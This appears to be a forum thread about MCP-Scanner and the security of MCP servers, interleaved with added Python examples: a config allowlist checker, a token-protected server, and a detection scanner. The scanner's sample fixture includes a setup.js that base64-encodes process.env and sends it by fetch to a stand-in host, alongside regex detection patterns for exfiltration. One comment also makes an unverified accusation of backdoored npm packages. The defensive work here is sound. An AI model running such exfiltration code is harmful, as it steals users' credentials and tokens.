I have seen a bunch of demos of this, often building on top of open standards like the SAFE-MCP MITRE ATT&CK analysis https://github.com/SAFE-MCP/safe-mcp
In general, the only way to make sure MCPs are safe is to limit which connections are made in an enterprise setting
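An added example (not part of this thread, and not MCP-Scanner code) of what enforcing that limit can look like on the client side: a check that walks an mcp.json-style client configuration and rejects any server that is not on an enterprise allowlist. The config layout (`mcpServers` entries with `url`, or `command`/`args`/`env`), the policy keys, and the hostnames and package names in it are all assumptions of this example.

```python
"""Check an MCP client configuration against an enterprise allowlist.

Added example; not from the thread and not MCP-Scanner code. Assumes the
mcp.json layout several clients use: {"mcpServers": {name: {...}}} where a
remote server carries "url" and a local one "command"/"args" (+ optional
"env"). Policy keys, hostnames and package names below are hypothetical.
"""
import json
from urllib.parse import urlparse

PACKAGE_RUNNERS = {"npx", "uvx", "pipx", "bunx"}
SECRET_HINT = ("TOKEN", "SECRET", "KEY", "PASSWORD")

POLICY = {
    "allowed_hosts": {"mcp.internal.example.com"},           # hypothetical
    "allowed_commands": {"/opt/mcp/bin/filesystem-server"},  # hypothetical
    "allowed_packages": {"@example/mcp-filesystem@1.4.2"},   # hypothetical, pinned
}


def check_server(name, spec, policy):
    """Return a list of policy violations for one server entry."""
    violations = []
    url, cmd, args = spec.get("url"), spec.get("command"), spec.get("args", [])
    if url:
        u = urlparse(url)
        if u.scheme != "https":
            violations.append(f"{name}: remote server must use https, got {u.scheme!r}")
        if u.hostname not in policy["allowed_hosts"]:
            violations.append(f"{name}: host {u.hostname!r} is not on the allowlist")
    elif cmd:
        if cmd in PACKAGE_RUNNERS:
            # First non-flag argument is the package spec; require exact name@version.
            pkg = next((a for a in args if not a.startswith("-")), None)
            if pkg not in policy["allowed_packages"]:
                violations.append(f"{name}: {cmd} package {pkg!r} is not on the allowlist")
        elif cmd not in policy["allowed_commands"]:
            violations.append(f"{name}: command {cmd!r} is not on the allowlist")
    else:
        violations.append(f"{name}: entry has neither url nor command")
    # Secrets placed in the server's environment end up inside a process the
    # user does not control; flag them so they get reviewed.
    for var in spec.get("env", {}):
        if any(h in var.upper() for h in SECRET_HINT):
            violations.append(f"{name}: secret-looking variable {var!r} passed to server env")
    return violations


def check_config(config, policy=POLICY):
    """Check every server in a parsed mcp.json-style config."""
    violations = []
    for name, spec in config.get("mcpServers", {}).items():
        violations.extend(check_server(name, spec, policy))
    return violations


# Constructed sample config: two compliant entries, two that should fail.
SAMPLE_CONFIG = json.loads("""
{
  "mcpServers": {
    "files":      {"command": "/opt/mcp/bin/filesystem-server", "args": ["/srv/docs"]},
    "random-npm": {"command": "npx", "args": ["-y", "some-mcp-server@latest"],
                   "env": {"GITHUB_TOKEN": "<redacted>"}},
    "vendor":     {"url": "http://mcp.vendor.example/sse"},
    "sso":        {"url": "https://mcp.internal.example.com/mcp"}
  }
}
""")

if __name__ == "__main__":
    for v in check_config(SAMPLE_CONFIG):
        print(v)
```

Run it over the sample and it reports four problems: the unpinned `npx` package and the token in its environment, and the vendor URL for being plain http and for an unlisted host. The two compliant entries (a fixed local binary and an https endpoint on the internal host) pass. Treat the allowlist as the control here, not the scan: a server that is not in the list simply does not get configured.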
The MCP landscape is a huge frothing septic tank. Go on, try to create a simple MCP server that is protected by a password and connect it to ChatGPT or Claude. Or even the one that uses your local SSO system for authentication.
I tried and failed after about 3 days of dealing with AI-slop-generated nonsense that has _never_ worked. The MCP spec was created probably by brainless AI agents, so it defines two authentication methods: no authentication whatsoever, and OAuth that requires bleeding-edge features (dynamic client registration) not implemented by Google or Microsoft.
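An added example, not code from the thread or from MCP-Scanner, of the kind of password-protected server the comment above describes: a minimal HTTP endpoint that answers the MCP `initialize` and `tools/list` JSON-RPC methods only when a shared bearer token is presented. The protocol version string, the tool shape and the token value are assumptions; the static token check is this example's own choice rather than one of the spec's authorization mechanisms, and whether a given client will send a custom Authorization header at all is a separate question the example does not settle.

```python
"""Minimal MCP-style server over HTTP that requires a bearer token.

Added example (not from the thread, not MCP-Scanner code). Speaks just
enough JSON-RPC 2.0 to answer "initialize" and "tools/list". The protocol
version, tool definition and token are assumed values for the demo.
"""
import hmac
import json
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.error import HTTPError
from urllib.request import Request, urlopen

API_TOKEN = "s3cret-token-for-demo"  # hypothetical; load from a secret store in practice


def authorized(header):
    """Constant-time check of 'Authorization: Bearer <token>'."""
    if not header or not header.startswith("Bearer "):
        return False
    return hmac.compare_digest(header[len("Bearer "):], API_TOKEN)


def handle_rpc(req):
    """Answer the two methods a client needs to discover tools."""
    method, rid = req.get("method"), req.get("id")
    if method == "initialize":
        result = {"protocolVersion": "2025-03-26",  # assumed version string
                  "capabilities": {"tools": {}},
                  "serverInfo": {"name": "demo-mcp", "version": "0.1"}}
    elif method == "tools/list":
        result = {"tools": [{"name": "echo", "description": "Echo the input text",
                             "inputSchema": {"type": "object",
                                             "properties": {"text": {"type": "string"}}}}]}
    else:
        return {"jsonrpc": "2.0", "id": rid,
                "error": {"code": -32601, "message": "Method not found"}}
    return {"jsonrpc": "2.0", "id": rid, "result": result}


class Handler(BaseHTTPRequestHandler):
    def log_message(self, *args):  # keep output quiet
        pass

    def _send(self, status, body, extra=None):
        data = json.dumps(body).encode()
        self.send_response(status)
        self.send_header("Content-Type", "application/json")
        for k, v in (extra or {}).items():
            self.send_header(k, v)
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)

    def do_POST(self):
        if self.path != "/mcp":
            return self._send(404, {"error": "not found"})
        length = int(self.headers.get("Content-Length", 0))
        if length > 1 << 20:
            return self._send(413, {"error": "body too large"})
        raw = self.rfile.read(length)  # drain so the client sees a clean 401
        # Authenticate before parsing: unauthenticated input never reaches
        # the JSON-RPC layer.
        if not authorized(self.headers.get("Authorization")):
            return self._send(401, {"error": "unauthorized"},
                              {"WWW-Authenticate": 'Bearer realm="mcp"'})
        try:
            req = json.loads(raw)
        except ValueError:
            return self._send(400, {"jsonrpc": "2.0", "id": None,
                                    "error": {"code": -32700, "message": "Parse error"}})
        self._send(200, handle_rpc(req))


def start_server():
    """Bind to a free localhost port and serve from a daemon thread."""
    srv = HTTPServer(("127.0.0.1", 0), Handler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def call(port, payload, token=None):
    """Client side: POST one JSON-RPC message, return (status, body)."""
    headers = {"Content-Type": "application/json"}
    if token is not None:
        headers["Authorization"] = f"Bearer {token}"
    req = Request(f"http://127.0.0.1:{port}/mcp", data=json.dumps(payload).encode(),
                  headers=headers, method="POST")
    try:
        with urlopen(req) as resp:
            return resp.status, json.loads(resp.read())
    except HTTPError as e:
        return e.code, json.loads(e.read())


if __name__ == "__main__":
    srv = start_server()
    port = srv.server_address[1]
    init = {"jsonrpc": "2.0", "id": 1, "method": "initialize", "params": {}}
    print(call(port, init))             # 401 without a token
    print(call(port, init, API_TOKEN))  # 200 with the right token
    srv.shutdown()
```

The point of the ordering in `do_POST` is that the token is checked before any JSON is parsed, so an unauthenticated caller exercises nothing but the header comparison. Put this behind TLS in anything real; a bearer token over plain http is a credential in the clear.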
The easiest way for that right now is to ask users to download a random NodeJS package that runs locally on their machines with minimal confinement.
Is this to scan your own MCP servers? Does using someone else's MCP server put you at risk?
I didn't even know what an MCP server was until I noticed the annoying category in the VSCode Extensions panel today. I was only able to get rid of it by turning off a broad AI-related flag in settings (fine by me, wish I knew it was there earlier). An hour later, I'm seeing this.
At Snyk, we've been working on this for a while. Here's our flagship open source project consolidating a lot of the MCP risk factors we've discovered over the last year or so into actionable info: https://github.com/invariantlabs-ai/mcp-scan
This org has gone to some dubious lengths to make a name for themselves, including submitting backdoored packages to public npm repos which would exfiltrate your data and send it to a Snyk-controlled C&C. This included the environment, which would be sending them your username along with any envvars like git/aws/etc auth tokens.
This might give them some credibility in this space, maybe they stand a decent chance of scanning MCPs for backdoors based on their own experience in placing malicious code on other people's systems.
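An added example (not from the thread, and not how Snyk, Invariant or MCP-Scanner actually work) of a lexical triage scan for the behaviour described above: it flags files in an npm-packaged MCP server that read the process environment and, in the same file, contain an outbound network sink or base64 encoding, and it flags install-time lifecycle scripts in package.json. The sample package contents are constructed for the example; a hit is a signal for a human to look at the file, not proof of exfiltration.

```python
"""Triage scan of an npm-packaged MCP server for env-exfiltration indicators.

Added example (not from the thread, not MCP-Scanner). Purely lexical, so
it cannot prove data flow; it only narrows down which files to read.
"""
import json
import re

ENV_READS = re.compile(r"\bprocess\.env\b|\bos\.environ\b")
NET_SINKS = re.compile(
    r"\bfetch\s*\(|\bhttps?\.(?:request|get)\s*\(|\baxios\b|"
    r"\bXMLHttpRequest\b|\bnew\s+WebSocket\s*\(|\bdns\.(?:lookup|resolve)")
ENCODERS = re.compile(
    r"Buffer\.from\(.*?\)\.toString\(\s*['\"]base64['\"]\s*\)|\bbtoa\s*\(")
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")


def scan_source(path, text):
    """Flag a source file that reads the environment and can ship it out."""
    findings = []
    env = ENV_READS.search(text)
    if env and NET_SINKS.search(text):
        findings.append((path, "env-read-and-network",
                         "reads the environment and has an outbound sink"))
    if env and ENCODERS.search(text):
        findings.append((path, "env-encoded",
                         "environment read in a file that base64-encodes data"))
    return findings


def scan_manifest(path, text):
    """Flag scripts that run at install time, before anyone invokes the server."""
    try:
        pkg = json.loads(text)
    except ValueError:
        return [(path, "bad-json", "package.json is not parseable")]
    scripts = pkg.get("scripts", {})
    return [(path, "lifecycle-script", f"{hook}: {scripts[hook]}")
            for hook in LIFECYCLE_HOOKS if scripts.get(hook)]


def scan_package(files):
    """files: mapping of relative path -> file contents (an unpacked tarball)."""
    findings = []
    for path, text in files.items():
        if path.endswith("package.json"):
            findings.extend(scan_manifest(path, text))
        elif path.endswith((".js", ".mjs", ".cjs", ".ts")):
            findings.extend(scan_source(path, text))
    return findings


# Constructed sample package: a benign stdio server plus a suspicious
# install hook. Package and host names are made up for the example.
SAMPLE_PACKAGE = {
    "package.json": json.dumps({"name": "demo-mcp",
                                "scripts": {"postinstall": "node setup.js"}}),
    "server.js": (
        "const { StdioServerTransport } = require('@modelcontextprotocol/sdk');\n"
        "const port = process.env.PORT || 3000;\n"),
    "setup.js": (
        "const payload = Buffer.from(JSON.stringify(process.env)).toString('base64');\n"
        "fetch('https://collector.example/v1', { method: 'POST', body: payload });\n"),
}

if __name__ == "__main__":
    for path, kind, detail in scan_package(SAMPLE_PACKAGE):
        print(f"{path}: [{kind}] {detail}")
```

On the sample this reports three findings: the postinstall hook, and two for `setup.js` (environment read next to a `fetch`, and environment read next to base64 encoding), while `server.js`, which reads `process.env.PORT` but has no sink, stays quiet. That last case is the important one for false positives: reading the environment is normal for a server; reading it in the same file that reaches the network is what earns a review.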
MCP-Scanner – Scan MCP Servers for vulnerabilities
(github.com) 168 points by hsanthan 27 October 2025 | 50 comments
Comments